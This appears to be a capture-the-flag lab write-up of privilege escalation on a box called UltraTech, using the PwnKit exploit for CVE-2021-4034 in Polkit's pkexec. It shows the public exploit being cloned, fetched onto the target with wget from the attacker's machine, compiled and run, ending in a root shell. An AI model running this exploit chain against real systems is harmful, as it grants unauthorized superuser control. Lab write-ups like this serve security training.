InfoSec LAB

UltraTech_Privilege_Escalation_2

Created: 2 min read

CVE-2021-4034

PEAS has identified that the target system is vulnerable to CVE-2021-4034

The vulnerable program is a part of Polkit, which manages process privileges. Polkit’s pkexec allows for non-privileged processes to communicate with privileged ones, as well as instrumenting legitimate and authorized uses of privilege escalation similar to sudo.

A memory corruption flaw exists when no argument is passed to the function. By manipulating environment variables, an attacker can trick pkexec to load and execute arbitrary code with superuser privileges.

Exploit (pwnkit)

I found an exploit online

┌──(kali㉿kali)-[~/archive/thm/ultratech]
└─$ git clone https://github.com/berdav/CVE-2021-4034 ; tar -czf CVE-2021-4034.tar.gz CVE-2021-4034
Cloning into 'CVE-2021-4034'...
remote: Enumerating objects: 92, done.
remote: Counting objects: 100% (36/36), done.
remote: Compressing objects: 100% (17/17), done.
remote: Total 92 (delta 24), reused 19 (delta 19), pack-reused 56
Receiving objects: 100% (92/92), 22.71 KiB | 1.08 MiB/s, done.
Resolving deltas: 100% (44/44), done.

Downloading the exploit package to Kali

Exploitation

www@ultratech-prod:/dev/shm$ wget http://10.9.1.180/CVE-2021-4034.tar.gz ; tar -xf CVE-2021-4034.tar.gz ; cd CVE-2021-4034
--2024-07-22 17:53:06--  http://10.9.1.180/CVE-2021-4034.tar.gz
Connecting to 10.9.1.180:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 41867 (41K) [application/gzip]
Saving to: ‘CVE-2021-4034.tar.gz’
 
CVE-2021-4034.tar.gz              100%[=============================================================>]  40.89K  --.-KB/s    in 0.06s   
 
2024-07-22 17:53:07 (656 KB/s) - ‘CVE-2021-4034.tar.gz’ saved [41867/41867]

Delivery complete

www@ultratech-prod:/dev/shm/CVE-2021-4034$ make
cc -Wall --shared -fPIC -o pwnkit.so pwnkit.c
cc -Wall    cve-2021-4034.c   -o cve-2021-4034
echo "module UTF-8// PWNKIT// pwnkit 1" > gconv-modules
mkdir -p GCONV_PATH=.
cp -f /bin/true GCONV_PATH=./pwnkit.so:.

Compiling locally

www@ultratech-prod:/dev/shm/CVE-2021-4034$ ./cve-2021-4034
# whoami
root
# hostname
ultratech-prod
# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
       valid_lft forever preferred_lft forever
    inet6 ::1/128 scope host 
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 9001 qdisc fq_codel state UP group default qlen 1000
    link/ether 02:1c:21:b7:f9:bf brd ff:ff:ff:ff:ff:ff
    inet 10.10.57.71/16 brd 10.10.255.255 scope global dynamic eth0
       valid_lft 2775sec preferred_lft 2775sec
    inet6 fe80::1c:21ff:feb7:f9bf/64 scope link 
       valid_lft forever preferred_lft forever
3: docker0: <NO-CARRIER,BROADCAST,MULTICAST,UP> mtu 1500 qdisc noqueue state DOWN group default 
    link/ether 02:42:92:e3:60:06 brd ff:ff:ff:ff:ff:ff
    inet 172.17.0.1/16 brd 172.17.255.255 scope global docker0
       valid_lft forever preferred_lft forever
    inet6 fe80::42:92ff:fee3:6006/64 scope link 
       valid_lft forever preferred_lft forever

System Level Compromise

Interactive Graph View

Backlinks